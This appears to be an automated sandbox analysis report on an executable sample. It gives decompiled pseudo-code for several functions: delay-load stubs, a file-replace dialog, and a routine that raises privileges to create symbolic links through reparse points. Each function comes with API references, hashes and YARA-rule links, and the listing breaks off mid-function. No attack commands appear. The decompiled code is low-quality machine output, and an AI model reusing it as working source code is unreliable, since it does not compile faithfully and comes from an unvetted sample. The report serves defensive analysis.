Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
Opcode Fuzzy Hash: 8bece1b0922af4ae4e2dd42c2b5b441a6e28fdb0a5572d449c2642eee4b2878e
Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD1EC, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab6c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad1b1
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8acb37a3f5016f95249460b727bbe4c98e3e26379c1721efd190e4bc1e0788df
Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
Opcode Fuzzy Hash: 8acb37a3f5016f95249460b727bbe4c98e3e26379c1721efd190e4bc1e0788df
Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD200, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab6c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad1b1
0x001ad1b6
0x001ad1bd

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 917a45ccd62025bb54a03db36a61e3cfb965ed95a383c234997eefeac7502d49
Instruction ID: d52369c57b1e040c7f5ea6ff4e47a0a392b467c3ce9f3f733923b4469a40393d
Opcode Fuzzy Hash: 917a45ccd62025bb54a03db36a61e3cfb965ed95a383c234997eefeac7502d49
Instruction Fuzzy Hash: 22A0118EAA8802BC300E2200BC02E3A022CC8E2B28BB0880EF00380880AA80AE000032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD22F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab8c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad212
0x001ad217
0x001ad21e

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD217

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d04fcae44001669a6031013bd84c36ecdfc877698870e6d3efd8e5531314f520
Instruction ID: dbb9231b7c0c1682e6da34049b4033e088b236be586cb536911e02d80bbb3cd2
Opcode Fuzzy Hash: d04fcae44001669a6031013bd84c36ecdfc877698870e6d3efd8e5531314f520
Instruction Fuzzy Hash: 04A011CE2A8802BC300AA280BC02F3A032EC8E2B38330880EF00380880AA80EE000032

Uniqueness

Uniqueness Score: -1.00%

Function 001AD225, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E001AD225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x1cab8c); // executed
				E001AD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x001ad212
0x001ad217
0x001ad21e

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001AD217

Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58d015686cee3b03f9ed35ae41875dee8bb862b0b146f785248f5c68016056de
Instruction ID: dbb9231b7c0c1682e6da34049b4033e088b236be586cb536911e02d80bbb3cd2
Opcode Fuzzy Hash: 58d015686cee3b03f9ed35ae41875dee8bb862b0b146f785248f5c68016056de
Instruction Fuzzy Hash: 04A011CE2A8802BC300AA280BC02F3A032EC8E2B38330880EF00380880AA80EE000032

Uniqueness

Uniqueness Score: -1.00%

Function 00199BD6, Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00199BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x00199bd9
0x00199be2
0x00199be5

APIs

SetEndOfFile.KERNELBASE(?,00198F33,?,?,-00001960), ref: 00199BD9

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 76f65b52135f8f0095da4a4e3a5f5201b60f41c68517f392ec7f3e21feafd8a2
Instruction ID: fb8f19db69907e483ee9f9338afb3fc2afceb6f302ededcd6aba84ba2c5ed93b
Opcode Fuzzy Hash: 76f65b52135f8f0095da4a4e3a5f5201b60f41c68517f392ec7f3e21feafd8a2
Instruction Fuzzy Hash: C1B011300A000A8B8E002B30CC088283E22EB2230A30082B0B003CA0A0CF22C023AA00

Uniqueness

Uniqueness Score: -1.00%

Function 001A9A8D, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001A9A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x001a9a91
0x001a9a99
0x001a9a9d

APIs

SetCurrentDirectoryW.KERNELBASE(?,001A9CE4,C:\Users\user\Desktop,00000000,001D85FA,00000006), ref: 001A9A91

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b7fca6cb39fa1a3c2d02b08291a307ff15dd2b1055842b9cf9bffb1f47a1be6d
Instruction ID: 1607a875bf0647e5f1ddaf988d3db1b9959ee901f6ccf52a2fda66611764605e
Opcode Fuzzy Hash: b7fca6cb39fa1a3c2d02b08291a307ff15dd2b1055842b9cf9bffb1f47a1be6d
Instruction Fuzzy Hash: C6A01230194006478A000B30CC09C157A515760B02F008620B102C00A0CB30C850A500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001AAFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E001AAFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E001AD940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E001912D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E0019FAB1( &_a2640, _a6752, 0x800);
						E0019BA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0x1cdf00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00193E41( &_a900, 0x200, L"%s %s %s", E0019DA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E001A9D99();
								_push(E0019DA42(0 + _a344, 0x98));
								E00193E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0x1d75f4; // 0x0
							E001A082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00193E41( &_a896, 0x200, L"%s %s %s", E0019DA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0x1ece14;
							_t157 =  *0x1ece10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E001A9D99(_t157, _t153,  &_a212, 0x32);
								_push(E0019DA42(_t153, 0x98));
								E00193E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x1cdf4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x001aafb9
0x001aafb9
0x001aafbe
0x001aafc4
0x001aafcd
0x001aafd7
0x001aaff6
0x001ab000
0x001ab006
0x001ab080
0x001ab09b
0x001ab0aa
0x001ab0c0
0x001ab0dd
0x001ab0f3
0x001ab10f
0x001ab114
0x001ab127
0x001ab137
0x001ab13d
0x001ab143
0x001ab144
0x001ab14a
0x001ab14d
0x001ab154
0x001ab172
0x001ab17c
0x001ab184
0x001ab1a2
0x001ab1a7
0x001ab1b5
0x001ab1b8
0x001ab1c6
0x001ab1c8
0x001ab1da
0x001ab1e2
0x001ab1e4
0x001ab1e5
0x001ab1e7
0x001ab1e8
0x001ab1e9
0x001ab1f8
0x001ab213
0x001ab218
0x001ab226
0x001ab226
0x001ab23c
0x001ab242
0x001ab24d
0x001ab25c
0x001ab26c
0x001ab286
0x001ab29e
0x001ab2a8
0x001ab2b0
0x001ab2cf
0x001ab2d4
0x001ab2e2
0x001ab2ec
0x001ab2f2
0x001ab2f8
0x001ab30c
0x001ab31b
0x001ab332
0x001ab337
0x001ab345
0x001ab345
0x001ab2f8
0x001ab347
0x001ab347
0x001ab349
0x001ab353
0x001ab353
0x001ab00b
0x00000000
0x00000000
0x001ab016
0x001ab017
0x001ab019
0x001ab03d
0x001ab03d
0x001ab03f
0x001ab03f
0x001ab040
0x001ab04a
0x001ab052
0x001ab055
0x001ab055
0x001ab05d
0x00000000
0x001ab05d
0x001ab01b
0x001ab01e
0x001ab072
0x00000000
0x001ab072
0x001ab020
0x001ab023
0x001ab06f
0x00000000
0x001ab06f
0x001ab025
0x001ab028
0x001ab069
0x00000000
0x001ab069
0x001ab02a
0x001ab02d
0x00000000
0x00000000
0x001ab02f
0x001ab032
0x001ab065
0x00000000
0x001ab065
0x001ab037
0x00000000
0x00000000
0x00000000
0x001ab037
0x001aaff8
0x001aaffa
0x00000000

APIs

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001AB04A
EndDialog.USER32(?,00000006), ref: 001AB05D
GetDlgItem.USER32(?,0000006C), ref: 001AB079
SetFocus.USER32(00000000), ref: 001AB080
SetDlgItemTextW.USER32(?,00000065,?), ref: 001AB0C0
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001AB0F3
FindFirstFileW.KERNEL32(?,?), ref: 001AB109
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001AB127
FileTimeToSystemTime.KERNEL32(?,?), ref: 001AB137
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001AB154
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001AB172
_swprintf.LIBCMT ref: 001AB1A2

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

SetDlgItemTextW.USER32(?,0000006A,?), ref: 001AB1B5
FindClose.KERNEL32(00000000), ref: 001AB1B8
_swprintf.LIBCMT ref: 001AB213
SetDlgItemTextW.USER32(?,00000068,?), ref: 001AB226
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001AB23C
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001AB25C
FileTimeToSystemTime.KERNEL32(?,?), ref: 001AB26C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001AB286
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001AB29E
_swprintf.LIBCMT ref: 001AB2CF
SetDlgItemTextW.USER32(?,0000006B,?), ref: 001AB2E2
_swprintf.LIBCMT ref: 001AB332
SetDlgItemTextW.USER32(?,00000069,?), ref: 001AB345

Part of subcall function 001A9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001A9DBF
Part of subcall function 001A9D99: GetNumberFormatW.KERNEL32 ref: 001A9E0E

Strings

%s %s, xrefs: 001AB201, 001AB324
REPLACEFILEDLG, xrefs: 001AAFE0
%s %s %s, xrefs: 001AB190, 001AB2BC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: d13bb805db80b288114a06e4f04e7eab0e0edf2fb38e0a4bf1d9b8d943a280a6
Instruction ID: 57a4563cf42c13b8728460467a37082d2de17773b8cc7e6521440e90e31182b4
Opcode Fuzzy Hash: d13bb805db80b288114a06e4f04e7eab0e0edf2fb38e0a4bf1d9b8d943a280a6
Instruction Fuzzy Hash: 9191C576248348BFD631DBA0DD89FFB7BACEB8AB00F044819F645D2482D775E6058762

Uniqueness

Uniqueness Score: -1.00%

Function 00196FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00196FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E001AD870(E001C126D, _t242);
				E001AD940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0x1d0043 == 0) {
					E00197A15(L"SeRestorePrivilege");
					E00197A15(L"SeCreateSymbolicLinkPrivilege");
					 *0x1d0043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E00196ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E0019FAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E001B2B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E001B4DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E001B4DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E001B4D7E(_t228, _t232);
				_t116 = E001B2B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E00199D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E0019159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E001B4D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E001B4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E0019943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00199A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E001994DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E0019A12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E0019946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E00196BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E0019FC98() == 0) {
										E00191567(_t242 - 0x7c, 0x18);
										_t160 = E001A0A9F(_t242 - 0x7c);
									}
								}
								E001AE214(_t160);
								E00196E03(0x1d00e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E001B4D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E001B4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E0019B4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E001977F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}

0x00196fc6
0x00196fcb
0x00196fd5
0x00196fe7
0x00196fea
0x00196ff1
0x00196ffb
0x00197000
0x00197000
0x0019700b
0x0019700e
0x00197013
0x00197016
0x0019702d
0x00197040
0x00197043
0x0019704b
0x00197057
0x0019705c
0x00197061
0x00197063
0x00197065
0x0019706a
0x0019706e
0x0019707c
0x00197081
0x00197086
0x0019708a
0x0019708b
0x00197092
0x00197098
0x00197098
0x00197086
0x001970a0
0x001970ac
0x001970b1
0x001970b7
0x001970ba
0x001970c4
0x001970fe
0x00197101
0x00197102
0x00197103
0x0019710f
0x00197146
0x0019714c
0x0019714e
0x00000000
0x00000000
0x00000000
0x0019711a
0x0019712b
0x00197134
0x001972f4
0x001972f4
0x001972f8
0x001972fb
0x00197309
0x00197313
0x00197313
0x0019713b
0x00197154
0x00197154
0x0019715d
0x001971c5
0x001971c8
0x001971d2
0x001971d2
0x001971d5
0x001971dd
0x001971e3
0x001971e6
0x001971f1
0x001971f7
0x00197205
0x0019720a
0x0019720d
0x00197210
0x00197219
0x0019722e
0x0019723c
0x0019723c
0x0019723f
0x00197242
0x0019725a
0x0019725c
0x00197262
0x00000000
0x00000000
0x00197280
